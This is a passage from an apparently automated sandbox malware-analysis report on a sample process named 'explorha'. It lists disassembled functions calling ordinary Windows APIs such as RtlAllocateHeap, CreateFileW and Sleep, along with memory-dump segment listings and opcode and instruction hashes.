                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __wsopen_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 3347428461-0
                                                                                                      • Opcode ID: fa9e4f84c2537954528a7645091c7efd21ace892919fe0ec2aacfaf9fb8453fe
                                                                                                      • Instruction ID: 166cec2397ffe661faa204d7df2329e35f6b7b8b861c3336c8a142be7e94ca3b
                                                                                                      • Opcode Fuzzy Hash: fa9e4f84c2537954528a7645091c7efd21ace892919fe0ec2aacfaf9fb8453fe
                                                                                                      • Instruction Fuzzy Hash: 14111271A0420AAFCF05DF99E94199B7BF8FF49304F0540A9F809EB252D631EE15CBA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0089EE4F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0089BE33,00000001,00000364,00000006,000000FF,?,?,0087EA91,00878247,?,0087911B,8B18EC84), ref: 0089EE91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: dad3d853db0350deed41d9f7c529d4c4ec845a329882c8c9323baa93be3dd448
                                                                                                      • Instruction ID: 4ba5df6ae60570d690653c069e1429baf3255095ee7701a90760bbdb86936bcc
                                                                                                      • Opcode Fuzzy Hash: dad3d853db0350deed41d9f7c529d4c4ec845a329882c8c9323baa93be3dd448
                                                                                                      • Instruction Fuzzy Hash: BFF08232545229A69F21FAA69C05B6F7F99FF82770B1D8112BC18E6181CF71E80186E5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0089C66B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00878247,?,?,0087EA91,00878247,?,0087911B,8B18EC84,04980A5A), ref: 0089C69E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 3d7fdf02d2fca9a62cca83cc5a211b39f679b3a131ac3154a6de4f542b5bf28b
                                                                                                      • Instruction ID: d9acb89938cb7cccaf0a2e4037f7a8927685d460493965c9bda44c8c9d2c8809
                                                                                                      • Opcode Fuzzy Hash: 3d7fdf02d2fca9a62cca83cc5a211b39f679b3a131ac3154a6de4f542b5bf28b
                                                                                                      • Instruction Fuzzy Hash: 0BE09B361052265AEE6336655C01B6B7688FF673B0F2E2119EC04D6180DF62CC0145F5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008A2D95 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,008A3185,?,?,00000000,?,008A3185,00000000,0000000C), ref: 008A2DB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 93c85f58b70de8ec455d9845cfbee8ec7a0c920cab12aafc849feb73dd30bf1d
                                                                                                      • Instruction ID: 75e24a28cea11bb5138d1a62cd305b14454e9e9a209d596449f16437856072e0
                                                                                                      • Opcode Fuzzy Hash: 93c85f58b70de8ec455d9845cfbee8ec7a0c920cab12aafc849feb73dd30bf1d
                                                                                                      • Instruction Fuzzy Hash: 65D0923204010DBBDF129E84DC02EDA3BAAFB88714F014150BE5866020C732F831EB94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00878200 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3472027048-0
                                                                                                      • Opcode ID: 1225d9bf3e828a6aa5f92beb3a698e5361f317442c542f220093ad5dcd8d21ad
                                                                                                      • Instruction ID: 1330efbc66475bd775bb3f4edfb56755bdf4aa4c965144ff6f96f5bb26446d9b
                                                                                                      • Opcode Fuzzy Hash: 1225d9bf3e828a6aa5f92beb3a698e5361f317442c542f220093ad5dcd8d21ad
